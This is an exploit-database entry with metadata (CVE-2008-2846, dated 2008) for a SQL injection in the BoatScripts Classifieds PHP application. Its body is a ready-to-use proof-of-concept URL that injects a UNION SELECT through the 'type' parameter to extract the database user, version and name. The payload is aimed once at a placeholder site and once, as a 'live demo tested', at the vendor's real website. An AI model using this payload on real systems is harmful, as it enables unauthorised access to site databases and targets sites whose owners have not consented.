BoatScripts Classifieds - 'type' SQL Injection

Author: Stack
type: webapps
platform: php
port: 
date_added: 2008-06-17 
date_updated: 2016-12-08 
verified: 1 
codes: OSVDB-46425;CVE-2008-2846 
tags: 
aliases:  
screenshot_url:  
application_url: 

BoatScripts Classifieds Sql INjection

By Stack
Home v4-team.com

poc : http://site.co.il/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*
live demo tested
http://www.boatscripts.com/boats/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*

# milw0rm.com [2008-06-18]